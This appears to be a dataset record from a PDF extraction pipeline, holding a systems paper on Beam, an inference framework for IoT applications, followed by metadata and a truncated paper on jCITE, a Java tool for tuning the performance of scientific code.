1], [263, 645, 2], [645, 645, 3], [645, 1197, 4], [1197, 1537, 5], [1537, 1686, 6], [1686, 2055, 7], [2055, 2431, 8], [2431, 2978, 9], [2978, 3096, 10], [3096, 3428, 11], [3428, 3744, 12], [3744, 3877, 13], [3877, 4400, 14], [4400, 5070, 15], [5070, 5559, 16], [5559, 5886, 17], [5886, 6365, 18], [6365, 6395, 19], [6395, 7034, 20], [7034, 7118, 21], [7118, 7500, 22], [7500, 8001, 23], [8001, 8393, 24], [8393, 8968, 25], [8968, 9101, 26], [9101, 9206, 27], [9206, 9487, 28], [9487, 9654, 29], [9654, 9940, 30], [9940, 10194, 31], [10194, 10585, 32], [10585, 10843, 33], [10843, 11113, 34], [11113, 11523, 35], [11523, 11990, 36], [11990, 12327, 37], [12327, 12343, 38], [12343, 12653, 39], [12653, 12807, 40], [12807, 13396, 41], [13396, 13801, 42], [13801, 14209, 43], [14209, 14679, 44], [14679, 15330, 45], [15330, 15347, 46], [15347, 16013, 47], [16013, 16552, 48], [16552, 16890, 49], [16890, 17337, 50], [17337, 17833, 51], [17833, 18144, 52], [18144, 18488, 53], [18488, 18921, 54], [18921, 19350, 55], [19350, 19671, 56], [19671, 20127, 57], [20127, 20548, 58], [20548, 20835, 59], [20835, 21301, 60], [21301, 21549, 61], [21549, 21925, 62]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 21925, 0.0]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
6efd6a2a2d6ae4595a0ce21fbe159653e7fc12ea
A Case for Ending Monolithic Apps for Connected Devices Rayman Preet Singh (Univ. of Waterloo) Chenguang Shen (UCLA) Amar Phanishayee Aman Kansal Ratul Mahajan Microsoft Research 1 Introduction Connected sensing devices, such as cameras, thermostats, in-home motion, door-window, energy, water sensors [1], collectively dubbed as the Internet of Things (IoT), are rapidly permeating our living environments [2], with an estimated 50 billion such devices in use by 2020 [8]. They enable a wide variety of applications spanning security, efficiency, healthcare, and others. Typically, these applications collect data using sensing devices to draw inferences about the environment or the user, and use the inferences to perform certain actions. For example, Nest [10] uses motion sensor data to infer home occupancy and adjusts the thermostat. Most applications that use connected devices today are built in a monolithic way. That is, applications are tightly coupled to the hardware, and need to implement all the data collection, inferencing, and user functionality related logic. For application developers, this complicates the development process, and hinders broad distribution of their applications because the cost of deploying their specific hardware limits user adoption. For end users, each sensing device they install is limited to a small set of applications, even though the hardware capabilities may be useful for a broader set of applications. How do we break free from this monolithic and restrictive setting? Can we enable applications to work seamlessly in heterogeneous environments with different types of connected sensors and devices, while leveraging devices that may only be available opportunistically, such as smartphones and tablets? To address this problem, we start from an insight that many inferences required by applications can be drawn using multiple types of connected devices. For instance, home occupancy can be inferred using motion sensors (such as those in security systems or Nest [10]), cameras (e.g. Dropcam [3], Simplicam [14]), microphone, smartphone GPS, or using a combination of these, since each may have different sources of errors. We posit that inference logic, traditionally left up to applications, ought to be abstracted out as a system service. Such a service should relieve application developers of the burden of implementing and training commonly used inferences. It should enable applications to work using any of the sensing devices that the shared inference logic supports. This paper discusses the key challenges in designing the proposed service. First, the service must decouple i) “what is sensed” from “how it is sensed”, and ii) “what is inferred” from “how it is inferred”. In doing so, it should ensure inference extensibility, and provide a uniform interface to inferences which hides sensor-specific intricacies (e.g., camera frame rate, motion sensitivity level). Second, the service should enable seamless use of sensors on mobile devices by handling environmental dynamics resulting from device and user mobility. Third, while serving required inferences to applications, the service should ensure efficient use of resources, e.g., by selecting the optimal subset of sensors to serve active applications, sharing overlapping inference computations, and hosting computations on suitable devices. To explore these challenges concretely, we propose Beam, an application framework and runtime for inference driven applications. Beam provides applications with inference-based abstractions. Applications simply specify their inference requirements, while Beam bears the onus of identifying the required sensors, initiating data processing on suitable devices, handling environmental dynamics, and using resources efficiently. 2 Key Design Requirements Our motivation for designing Beam are data-driven-inference based applications, aimed at homes [10, 16], individual users [9, 11, 41, 48, 50] and enterprises [6, 13, 20, 33, 42]. We identify three key challenges for Beam by analyzing two popular application classes in detail, one that infers environmental attributes and another that senses an individual user. Rules: A large class of popular applications is based on the ‘If This Then That (IFTTT)’ pattern [7, 47]. IFTTT enables users to create their own rules connecting sensed attributes to desired actions. We consider a particular rules application which alerts a user if a high risk appliance, e.g., electric oven, is left on when the home is unoccupied [15, 44]. This application uses the appliance- Figure 1: Improvement in occupancy and activity inference accuracy by combining multiple devices. For occupancy, sensor set 1 = \{camera, microphone\} in one room and set 2 = \{PC interactivity detection\} in a second room. For physical activity, set 1 = \{phone accelerometer\} and set 2 = \{wrist worn FitBit\}. state and home occupancy inferences. Quantified Self (QS) [9, 11, 19, 25, 38, 46] which disaggregates a user’s daily routine, by tracking her physical activity (walking, running, etc), social interactions (loneliness), mood (bored, focused), computer use, and more. In analyzing these two popular classes of applications, we identify the following three key design requirements for an inference framework: R1) Decompose applications, inference algorithms, and devices. Data driven inferences can often be derived using data from multiple devices. Combining inputs from multiple devices, when available, generally leads to improved inference accuracy (often overlooked by developers [10]). In Figure 1 we illustrate the improvement in inference accuracy for the occupancy and physical activity inferences, used in the Rules and Quantified Self applications respectively; 100% accuracy maps to manually logged ground truth over 28 hours. Hence, applications should not be restricted to using a single sensor, or a single inference algorithm. At the same time, applications should not be required to incorporate device discovery, handle the challenges of potentially using devices over the wide area (e.g., remote I/O and tolerating disconnections), use disparate device APIs, and instantiate and combine multiple inferences depending on available devices. Therefore an inference framework should require an application to only specify the desired inference, e.g., occupancy (in addition to inference parameters like sampling rate and coverage), while handling the complexity of configuring the right devices and inference algorithms. R2) Handle environmental dynamics. Applications are often interested in tracking user and device mobility, and in adapting their processing accordingly. For instance, the QS applications need to track which locations a user frequents (e.g., home, office, car, gym, meeting room, etc), handle intermittent connectivity, and more. Application development stands to be greatly simplified if the framework were to seamlessly handle such environmental dynamics, e.g., automatically update the selection of devices used for drawing inferences based on user location. Hence the QS application, potentially running on a cloud server, could simply subscribe to the activity inference, which would be dynamically composed of sub-inferences from various devices tracking a user. R3) Optimize resource usage. Applications often involve continuous sensing and inferring, and hence consume varying amounts of system resources across multiple devices over time. Such an application must structure its sensing and inference processing across multiple devices, in keeping with the devices’ resource constraints. This adds undue burden on developers. For instance, in the QS application, wide area bandwidth constraints may prevent backhauling of high rate sensor data. Moreover, whenever possible, inferences should be shared across multiple applications to prevent redundant resource consumption. Therefore an inference framework must not only facilitate sharing of inferences, but in doing so must optimize for efficient resource use (e.g., network, battery, CPU, memory, etc) while meeting resource constraints. 3 Related Work Beam is the first framework that (i) decouples applications, inference algorithms, and devices, (ii) handles environmental dynamics, and (iii) automatically splits sensing and inference logic across devices while optimizing resource usage. We classify prior work into four categories, and compare them based on the requirements above (Table 1). <table> <thead> <tr> <th>Category</th> <th>R1</th> <th>R2</th> <th>R3</th> </tr> </thead> <tbody> <tr> <td>Device abstractions</td> <td>24</td> <td>12</td> <td>18</td> </tr> <tr> <td>Mobile sensing</td> <td>23</td> <td>40</td> <td></td> </tr> <tr> <td>Cross-device</td> <td>49</td> <td>45</td> <td></td> </tr> <tr> <td>Macro-programming</td> <td>22</td> <td>26</td> <td>35</td> </tr> </tbody> </table> Table 1: Categorization of prior work. • denotes partial fulfillment. inference modules and edges correspond to channels that facilitate the transmission of inference data units (IDUs) between modules. Figure 2 shows an example inference graph for a Quantified Self application that uses eight different devices spread across the user’s home and workplace, and includes mobile and wearable devices. Composing an inference as a directed graph enables sharing of data processing modules across applications and across modules that require the same input. In Beam, each compute device associated with a user, such as a tablet, phone, PC, or home hub, has a part of the runtime, called the Engine. Engines host inference graphs and interface with other engines. Figure 3 shows two engines, one on the user’s home hub and another on her phone; the inference graph for QS shown earlier is split across these engines, with the QS application itself running on a cloud server. For simplicity, we do not show another engine that may run on the user’s work PC. **IDU:** An Inference data unit (IDU) is a typed inference, and in its general form is a tuple $<t,e,s>$, which denotes any inference with state information $s$, generated by an inference algorithm at time $t$ and error $e$. The types of the inference state $s$, and error $e$, are specific to the inference at hand. For instance, $s$ may be of a numerical type such as a double (e.g., inferred energy consumption), or an enumerated type such as, high, medium, low, or numerical types. Similarly, error $e$ may specify a confidence measure (e.g., standard deviation), probability distribution, or error margin (e.g., radius). IDUs abstract away “what is inferred” from “how it is inferred”. The latter is handled by inference modules, which we describe next. **Inference Modules:** Beam encapsulates inference algorithms into typed modules. Inference modules consume IDUs from one or more modules, perform certain computation using IDU data and pertinent in-memory state, and output IDUs. Special modules called adapters interface with underlying sensors and output sensor data as IDUs. Adapters decouple “what is sensed” from “how it is sensed”. Module developers specify the IDU types a module consumes, the IDU type it generates, and the module’s input dependency (e.g., {PIR} OR {camera AND mic}). Modules have complete autonomy over how and when to output an IDU, and can maintain arbitrary internal state. For instance, an occupancy inference module may specify (i) input IDUs from microphone, camera, and motion sensor adapters, (ii) allow multiple microphones as input, and (iii) maintain internal state to model ambient noise. **Channels:** To ease inference composition, channels link modules to each other and to applications. They abstract away the complexities of connecting modules across different devices, including dealing with device disconnec- --- **Figure 2: Inference graph for Quantified Self app.** Inference and optimizing for efficient resource usage. **Mobile sensing frameworks:** Existing work has focused on applications requiring continuous sensing on mobile devices. Kobe [23] and Auditeur [40] propose building libraries of inference algorithms to promote code re-use and to enable developers to select inference algorithms. Other work [29, 30, 31, 32, 34] has focused on improving resource utilization by sharing sensing and data processing across multiple applications on a mobile device. Senergy [32] automates selection of inference algorithms driven by an application requirements on a mobile device. These approaches overlook handling environmental dynamics across devices, and do not address optimizing resource use for inferences across multiple devices. Moreover, they require manual composition of certain inference parameters (e.g., coverage), thus providing limited decoupling of inference algorithms. **Cross-device frameworks:** Semantic Streams [49] and Task Cruncher [45] address sharing sensor data and data processing across devices, but are limited to simple stream processing methods, e.g., aggregates, rather than sophisticated inferences. They overlook decoupling of sensing and inferring, as well as handling of dynamics. **Macro-programming frameworks:** Macro-programming frameworks [22, 26, 35] provide abstractions to allow applications to dynamically compose dataflows [36, 39]. However these approaches focus on data streaming and aggregations rather than generic inferences, and do not target general purpose compute devices e.g., phones, PCs. In addition, they do not address handling of environmental dynamics and resource optimization across devices at runtime. --- **4 Beam Inference Framework** We propose Beam as a framework for distributed applications using connected devices. Applications in Beam subscribe to high-level inferences. Beam dynamically composes the required modules to satisfy application requests by using appropriate devices in the given deployment. Central to Beam’s design are a set of abstractions that we describe next. **Inference Graphs:** Inference graphs are directed acyclic graphs that connect devices to applications. The nodes... tions, and allowing for optimizations such as batching IDU transfers for efficiency. Every channel has a single writer and a single reader module. Modules have to have multiple input and output channels. Channels connecting modules on the same engine are local. Channels connecting modules on two different engines, across a local or wide area network, are remote channels. They enable applications and inference modules to seamlessly use remote devices or remote inference modules. Coverage tags: Coverage tags help manage sensor coverage. Each adapter is associated with a set of coverage tags which describes what the sensor is sensing. For example, a location string tag can indicate a coverage area such as “home” and a remote monitoring application can use this tag to request an occupancy inference for this coverage area. Coverage tags are strongly typed. Beam uses tag types only to differentiate tags and does not dictate tag semantics. This allows applications complete flexibility in defining new tag types. Adapter are assigned tags by the respective engines at setup time, and are updated at runtime to handle dynamics. Beam’s runtime also consists of a Coordinator which interfaces with all engines in a deployment and runs on a server that is reachable from all engines. The coordinator maintains remote channel buffers to support reader or writer disconnections (typical for mobile devices). It also provides a place to reliably store state of inference graphs at runtime while being resistant to engine crashes and disconnections. The coordinator is also used to maintain reference time across all engines. Engines interface with the coordinator using a persistent web-socket connection, and instantiate and manage the parts of an inference graph(s) local to them. 4.1 Beam Runtime The Beam runtime creates or updates inference graphs when applications request inferences (R1), and mutates the inference graphs to handle environmental dynamics (R2) and to optimizes resource usage (R3). Inference graph creation: An application may run on any user device and the sensors required for a requested inference may be spread across devices. Applications request their local Beam engine for all inferences they require. All application requests are forwarded to the coordinator, which uses the requested inference to lookup the required module. It recursively resolves all required inputs of that module (as per its specification), and re-uses matching modules that are already running. The coordinator maintains a set of such inference graphs as an incarnation. The coordinator determines where each module in the inference graph should run and formulates the new incarnation. The coordinator initializes buffers for remote channels, and partitions the inference graphs into engine-specific subgraphs which are sent to the engines. Engines receive their respective subgraphs, compare each received subgraph to existing ones, and update them by terminating deleted channels and modules, initializing new ones, and changing channel delivery modes and module sampling rates as needed. Engines ensure that exactly one inference module of each type with a given coverage tag is created. Inference delivery and guarantees: For each inference request, Beam returns a channel to the application. The inference request consists of i) required inference type or module, ii) delivery mode, iii) coverage tags, and iv) sampling requirements (optional). Delivery mode is a channel property which captures data transport optimizations. For instance, in the fresh push mode, an IDU is delivered as soon as the writer-module generates it, while in the lazy push mode, the reader chooses to receive IDUs in batches (thus amortizing network transfer costs from battery-limited devices). Remote channels provide IDU delivery in the face of device disconnections by using buffers at the coordinator and the writer engine. Channel readers are guaranteed i) no duplicate IDU delivery, and ii) FIFO delivery based on IDU timestamps. Currently, remote channels use the drop-tail policy to minimize wide-area data transfers in the event of a disconnected/lazy reader. This means when a reader re-connects after a long disconnection, it first receives old inference values followed by more recent ones. A drop-head policy may be adopted to circumvent this, at the cost of increased data transfers. In requesting inferences, applications use tags to specify coverage requirements. Furthermore, an application may specify sampling requirements as a latency value that it can tolerate in detecting the change of state for an inference (e.g., walking periods of more than 1 minute). This allows adapters and modules to temporarily halt sensing and data processing to reduce battery, network, CPU, or other resources. **Optimizing resource use:** The Beam coordinator uses inference graphs as the basis for optimizing resource usage. The coordinator re-configures inference graphs by remapping the engine on which each inference module runs. Optimizations are either performed reactively i.e., when an application issues/cancels an inference request, or proactively at periodic intervals. Beam’s default reactive optimization minimizes the number of remote channels and proactive optimization minimizes the amount of data transferred over remote channels. Other potential optimizations can minimize battery, CPU, and/or memory consumption at engines. When handling an inference request, the coordinator first incorporates the requested inference graph into the incarnation, re-using already running modules, and merging inference graphs if needed. For new modules, the coordinator decides on which engines they should run (by minimizing the number of remote channels). Engines profile their subgraphs, and report profiling data (e.g., per-channel data rate) to the coordinator periodically. The coordinator annotates the incarnation using this data and periodically re-evaluates the mapping of inference modules to engines. Beam’s default proactive optimization minimizes wide area data transfers. **Handling dynamics:** Movement of users and devices can change the set of sensors that satisfy an application requirements. For instance, consider an application that requires camera input from the device currently facing the user at any time, such as the camera on her home PC, office PC, smartphone, etc. In such scenarios, the inference graph needs to be updated dynamically. Beam updates the coverage tags to handle such dynamics. Certain tags such as those of location type (e.g., “home”) can be assumed to be static (edited only by the user), while for certain other types, e.g. user, the sensed subject is mobile and hence the sensors that cover it may change. The coordinator’s tracking service manages the coverage tags associated with adapters on various engines. The engine’s tracking service updates the user coverage tags as the user moves. For example, when the user leaves her office and arrives at home, the tracking service removes the user tag from device adapters in the office, and adds them to adapters of devices deployed in the home. The tracking service relies on device interactions to track users. When a user interacts with a device it updates the tags of all sensors on the device to include the user’s tag. When coverage tags change (e.g., due to user movement and change in sensor coverage), the coordinator re-computes the inference graphs and sends updated subgraphs to the affected engines. ### 4.2 Implementation Our Beam prototype is implemented in C# as a cross-platform portable service that can be used by .NET v4.5, Windows Store 8.1, and Windows Phone 8.1 applications. Module binaries are currently wrapped within the service, but may also be downloaded from the coordinator on demand. We have implemented 8 inference modules: mic-occupancy [27], camera-occupancy, appliance-use [21, 28], occupancy, pc-activity [37], fitness-activity [43], semantic-location, social-interaction, and 9 adapters: tablet and pc mic, power-meter, fitbit [4], GPS, accelerometer, pc-interaction, pc-event, and a HomeOS [24] adapter to access all its device drivers. We have implemented the two sample applications, described in Sec 2. Both applications run on a cloud VM; Beam hosts the modules for their inferences across the user’s home PC, work PC, and phone. Compared to monolithic or library based approaches, we find that for these applications using Beam’s framework results in up to 4.5× lower number of tasks and 12× lower SLoC, up to 3× higher inference accuracy due to Beam’s handling of environmental dynamics, and Beam’s dynamic optimizations match hand optimized versions for network resource usage. We aim to enrich Beam’s optimizer to include optimizations for battery, CPU, and memory, and plan to extend tracking support to objects using passive tags, e.g., RFID, or QR codes [17]. ### 5 Conclusion Applications using connected devices are difficult to develop today because they are constructed as monolithic silos, tightly coupled to sensing devices, and must implement all data sensing and inference logic, even as devices move or are temporarily disconnected. We present Beam, a framework and runtime for distributed inference-driven applications that (i) decouples applications, inference algorithms, and devices, (ii) handles environmental dynamics, and (iii) automatically splits sensing and inference logic across devices while optimizing resource usage. Using Beam, applications only specify “what should be sensed or inferred,” without worrying about “how it is sensed or inferred.” Beam simplifies application development and maximizes the utility of user-owned devices. **It is time to end monolithic apps for connected devices.** References
{"Source-Url": "https://www.microsoft.com/en-us/research/wp-content/uploads/2016/10/Beam_HotOS_2015.pdf", "len_cl100k_base": 4726, "olmocr-version": "0.1.50", "pdf-total-pages": 7, "total-fallback-pages": 0, "total-input-tokens": 23759, "total-output-tokens": 7361, "length": "2e12", "weborganizer": {"__label__adult": 0.0004532337188720703, "__label__art_design": 0.0005955696105957031, "__label__crime_law": 0.0004727840423583984, "__label__education_jobs": 0.0006990432739257812, "__label__entertainment": 0.00013267993927001953, "__label__fashion_beauty": 0.0002703666687011719, "__label__finance_business": 0.00040602684020996094, "__label__food_dining": 0.0004422664642333984, "__label__games": 0.0009436607360839844, "__label__hardware": 0.0059967041015625, "__label__health": 0.0010528564453125, "__label__history": 0.0004742145538330078, "__label__home_hobbies": 0.00018727779388427737, "__label__industrial": 0.0007529258728027344, "__label__literature": 0.0003516674041748047, "__label__politics": 0.00034546852111816406, "__label__religion": 0.0004684925079345703, "__label__science_tech": 0.375732421875, "__label__social_life": 0.0001170039176940918, "__label__software": 0.0150604248046875, "__label__software_dev": 0.59326171875, "__label__sports_fitness": 0.0004584789276123047, "__label__transportation": 0.0011472702026367188, "__label__travel": 0.0002651214599609375}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 30617, 0.02709]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 30617, 0.43511]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 30617, 0.84344]], "google_gemma-3-12b-it_contains_pii": [[0, 4591, false], [4591, 8819, null], [8819, 13943, null], [13943, 18066, null], [18066, 23726, null], [23726, 27797, null], [27797, 30617, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4591, true], [4591, 8819, null], [8819, 13943, null], [13943, 18066, null], [18066, 23726, null], [23726, 27797, null], [27797, 30617, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 30617, null]], "pdf_page_numbers": [[0, 4591, 1], [4591, 8819, 2], [8819, 13943, 3], [13943, 18066, 4], [18066, 23726, 5], [23726, 27797, 6], [27797, 30617, 7]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 30617, 0.05042]]}
olmocr_science_pdfs
2024-11-28
2024-11-28
8d51d2249d0bd68152b9107064dbe3f5ffb530e9
Java and Scientific Programming: Portable Browsers for Performance Programming Michal Cierniak cierniak@cs.rochester.edu Department of Computer Science University of Rochester Rochester, NY 14627 Suresh Srinivas ssuresh@engr.sgi.com Silicon Graphics Incorporated 2011 North Shoreline Blvd Mountain View, CA 94040 Abstract We present jCITE, a performance tuning tool for scientific applications. By combining the static information produced by the compiler with the profile data from real program execution, jCITE can be used to quickly understand the performance bottlenecks. The compiler information allows great understanding of what optimizations have been performed. The user can also find out which optimization have not been applied and why. Platform independence makes Java the ideal implementation platform for our tool. SGI users can have the same performance analysis tool on all platforms. You can run jCITE on an SGI O2 computer to optimize code for that machine, or you can run jCITE from within Netscape on a SPARCstation to analyze performance of a Cray application. In our experiments we were able to significantly speed up some SPEC95 applications in a few days or even a few hours without any prior knowledge of those applications. 1 Introduction – the need for performance programming for Scientific Computing Performance is at the heart of scientific and engineering computing. Tuning a critical inner loop could lead to drastic reduction in the running time of a large scientific or engineering application. This paper is about portable performance programming tools for the scientific and engineering programmer. Larry Carter and Bowen Alpern define performance programming as “programming when a 30% improvement in speed may be worth weeks of work” [1]. According to their work obtaining maximum application performance on a given platform is difficult. Completely automatic optimizations, while very effective, do not fully solve the problem. This is evident in the complex optimization options used to compile standard benchmarks, like SPEC95 [10]. By performance programming we understand tuning applications with very demanding performance requirements. Performance programming usually requires manual tuning of the source code and compiler options to obtain the fastest code. Having a number of performance programmers is common in hardware companies whose focus is scientific and engineering computation. They help tune a number of large ISV (Independent Software Vendor) applications such as LS-DYNA3D—a large Fortran application which is used in a variety of applications from automobile design and safety to biomechanics. The unfortunate reality is that performance programming is hard. The advent of optimizing compilers which perform various transformations on the program source to utilize the memory hierarchy better has made performance programming even harder. A performance programmer usually has the following in their arsenal: - Algorithmic and computational knowledge in specific areas such as Fluid dynamics, Operations Research, Structural Mechanics, Computational Chemistry. - Good understanding of various compiler options (flags), computer architecture, and assembly programming. - Dynamic tools such as prof, pixie, and hardware counters (in newer microprocessors such as the MIPS R10000, the Digital Alpha 21164, and the Sun UltraSPARC)—to understand the profile of their application and identify subroutines or functions to focus their attention. We have designed jCITE—a Java based browser—to alleviate the performance programming problem. jCITE helps optimize applications whose performance are difficult to understand. It does so by adding several things to the performance programmers arsenal: - Details of compiler optimization or optimization failure (non-optimizations) information at the level of the application source. - Visual metaphors for correlating original source, compiler transformed source, and runtime performance information. - Ability to query for detailed compiler optimization information at application hot-spots (elsewhere as well). - Provides a portable browser to be used in a heterogeneous environment (e.g., connecting to an SGI Origin2000 through an SGI O2, Apple Power Mac, or a Compaq Presario). jCITE uses profiling information to find program fragments which the performance programmer has to concentrate on. If the hardware allows it, the same runtime information can be also used to make a rough judgment on the nature of the performance problem (R10000 performance counters [11, 9] can measure and classify cache misses, floating point operation and other processor events useful for understanding the performance). The runtime information is combined with the information produced by the compiler about applied optimizations/non optimizations. jCITE does not: - Assist the performance programmer in choosing data structures or algorithms. - Allow editing of the program. We assume that available editors are used for that purpose. In the jCITE browser we combine both the compile time and runtime performance information in a visually appealing way. We introduce a new visual metaphor known as *Synchronization*. Say you have two text windows one containing the original program source and the other containing the compiler transformed source. By *Synchronization* them we mean that when the mouse is moved over a region of text in the original source window, regions of text that are compiler transformed (derived from that region) are highlighted on the second window and vice versa. We also have borrowed other metaphors such as hypertext and context sensitive pop-up menus that have become popular in Web browsers. The paper is structured into the following sections: - **Case Studies:** where we illustrates how jCITE works using two examples familiar to scientific programming. - **Design and Architecture:** where we describe the inner workings of the jCITE browser. - **Experiments:** where we present results from using jCITE to do performance tuning of the compiler and a SPEC95 integer application. - **Lessons Learned and Conclusions:** where we describe what we learned in the process as well as describe related and future work. 2 Case Studies We walk through two examples (matrix multiply and SPEC95 multi grid) to illustrate some of the capabilities of the jCITE browser. 2.1 Example 1—matrix multiply Multiplying two matrices is a recurring theme in scientific computing. We use a simple program that does matrix multiply in several different ways as well as multiply matrices of several different sizes to illustrate: - Synchronizing original source and compiler transformed source. - Querying static compiler information produced for loop nests and inner loops. In Figure 1 we can see a snapshot of jCITE when the matrix multiply fortran program is loaded in. jCITE automatically loads in any compiler transformed sources if the programmer had asked them to be produced by the compiler (the option -LIST: cite causes the SGI MIPS Pro 7.x compilers to produce the relevant files). In the snapshot the current line was 75 in the subroutine mmjki200. By default jCITE assumes that the programmer wants synchronization between the source and the transformed source. This can be turned off. In the same figure we see a number of lines on the right window highlighted in blue. These are the source lines that are in the compiler transformed source that came originally from line 75. As we can see from the snapshot the compiler has performed a number of transformations on this small—8 line—subroutine. It has: - Peeled out the initialization of the result matrix. - Changed the order of the loops. “i” is now the inner loop. - It has tiled the loops to utilize the memory hierarchy better. It has tiled for both first and second levels of caches. - It has register blocked or unroll and jammed the inner tiles to use registers better as well as to make it better schedulable for the code generator. The compiler—in this case the loop nest optimizer—produces this information for jCITE in a separate file. Figure 2 shows an example of what is produced for the loop nest on line 71, 72 and 74. Lisp-like format is used for historical reasons (jCITE had its origins in CITE which was written to work within Lucid’s XEmacs). 2.2 Example 2—SPEC95 107.mgrid The 107.mgrid program is part of the SPEC CPU95 (floating point) benchmark. It is a multi-grid solver in a 3D potential field. Its reference dataset is quite large but the program itself is just 500 lines of fortran77 code. It is also one of the easiest to parallelize by an automatic parallelizer. We use it as a case study to illustrate: - Annotating runtime performance information on the application source while maintaining correlation between application source and compiler transformed source. - Automatic Parallelization Information. This also includes array region information when the parallelizer cannot parallelize the loop. - Combining runtime performance information with compiler information. - Annotating multiple runtime performance information on the application source. Figure 3 shows a snapshot of jCITE when the mgrid program is loaded and the programmer asks to see the number of cycles (the histogram labeled cy_hwc) each line of mgrid has consumed. The cycles are measured using program counter sampling whenever the R10000 processor’s internal cycle measurement counter overflows. The programmer can also ask jCITE to hypertext/annotate all the loops that were parallelized or were not parallelized. Notice how the scrollbars are also painted to show the program hot-spots. For the loop nest we are seeing in the figure, the compiler has parallelized the outermost loop and so has partitioned the I2 loop amongst all the processors. The figure also shows that the compiler has removed a number of array references out of the loop. This snapshot is from a pre-release version of the automatic parallelizer. Figure 4 shows a snapshot of jCITE with mgrid but at a later point than Figure 3. The programmer has asked to see the cycle counts (cy_hwc), secondary cache misses (dsc_hwc) as well as compiler information on one of the loops. Notice how a new embedded graphics window shows the cache miss histogram and a new split window at the bottom shows the compiler information. 3 Design and Architecture of jCITE Compilers alone cannot provide a fully automatic solution to the performance programming problem for the following reasons: - Programmers often have high-level knowledge about the problem and the application domain which can be used for optimizations, but cannot be inferred from the source code alone. - Some optimization techniques while possible in practice are not implemented in the compiler (or are implemented incorrectly). The problem with manual tuning is that complex, scientific programs are difficult to understand—especially if the programmer who performs the tuning for a given platform is not the original author of the application, or if the application had multiple authors. 3.1 Design Goals We address the difficulties encountered by application programmers by building a browser which will help understand the performance impact of compiler optimizations. The design of jCITE focused on the following goals: - Integration of static information generated by the compiler with the dynamic information obtained by profiling the program. - Presenting information at high-level as much as possible. Both the profiling and compiler information are mapped to the original source program, but it is possible to simultaneously see the same code fragment as transformed source or assembly, if the low-level information is necessary. - Portability and smooth integration with Web Browsers. We wanted to be able to run jCITE on any platform. We also wanted to be able to make jCITE work under any Web Browser. - Ease of use. Generation and use of the extra information by the compiler and the profiler should be as simple as possible. - Extendibility. It should be easy to add new functionality if required by a given set of applications. The rest of this section will show how we have achieved those goals from the point of view of specific design decisions. 3.2 Working with the jCITE browser jCITE centers around the application source code. However, additional information is required to show anything more than the source code (jCITE itself does not perform any analysis of the source code—it combines information from the MIPS Pro compiler and the Speedshop run-time performance collection tools). The work with jCITE usually follows the pattern of: 1. Compile the application with \texttt{-LIST:cite} option. 2. Run the desired experiments with Speedshop. 3. Analyze the program with jCITE. If satisfied, stop. 4. Modify the source, and or change compiler options. 5. Go to step 1. MIPS Pro compilers save the information in files whose names can be derived from the source file names. Running Speedshop is optional but we highly recommend it since the run-time information often offers invaluable insight about the program behavior. We assume that the profiling information produced by Speedshop is saved in files whose names are derived from the application name and the monitored event name [9] (examples of events are: clock cycles, primary data... cache misses, secondary instruction cache misses, or floating point operations). It is the user’s responsibility to save the profiling information in files with appropriate files names. This effect can be trivially achieved with a simple script since the file names we use follow the same conventions for event names as the Speedshop tools. Upon start jCITE searches the appropriate directories for compile-time and profile information and automatically configures itself to use all available information. 3.3 jCITE: Why implement in Java? Why did we choose to implement jCITE in Java? 1. Portability. We wanted the jCITE browser to be able to work on a variety of platforms. For example we wanted to be eventually able to connect to Origin2000 from SGI O2, Apple Power Mac or Compaq Presario using the jCITE browser. 2. High level component (Java Bean) availability for spreadsheets, and variety of graphics components for visual display of information. We wanted the jCITE browser to be extended by others to use components written by other ISV’s developing for Java. 3. Live documentation accessible through Web Browsers. We wanted jCITE to be able to run within a Web browser. This would allow potential customers to get a feel for what the SGI Compilers and performance tools can do through the Internet. Implementing in Java was fun but we encountered a number of performance problems which we will discuss in the final section. 3.4 Generating compiler information The SGI MIPS Pro compiler has special options that allow it to produce listing files that describes the loop optimizations that it performed. Since the loop nest optimizations are fairly high level it maybe desirable to view the code after the loop nest optimizations. To accomplish this the SGI MIPS Pro compiler provides translators from its internal format back to Fortran or C. These translators can be invoked using listing options in the compiler. Other optimizations such as inner loop unrolling, software pipelining, and local scheduling produce compiler information by embedding them in the assembly file as comments. The compiler produces a variety of information for jCITE. These include: - **Loop Nest Information** including register, cache blocking, dependence problems, fission, and fusion. - **Prefetch Information** which includes the array references that are prefetched and whether they are for the L1 or L2 cache, the confidence numbers for them and other details about them such as the volume that is prefetched in a given loop per iteration of the loop. - **Structure of Loop Nests** which is a sketch of the loop structure after all the loop level transformations. This information helps identify whether a loop was a wind-down, regular loop or peeled loop. It also gives number of iterations the loop is going to execute or an estimate for the trip count. - **Software Pipelining Information** which provides information about the number of cycles it takes to execute an inner loop. It also gives the number of integer operations, the floating point operations, as well as what percent of the processor peak the operations are executing. If the inner loop did not pipeline then reasons for that are also given. Similar information is provided by the scheduler for loops that are not inner loops. - **Inner Loop Unrolling Information** gives the unrolling factor by which inner loops were unrolled. If they were not unrolled it lists why the inner loop was not unrolled. - **Parallelization Information** tells what loops the automatic parallelizer expects to go in parallel as well as regions of various arrays 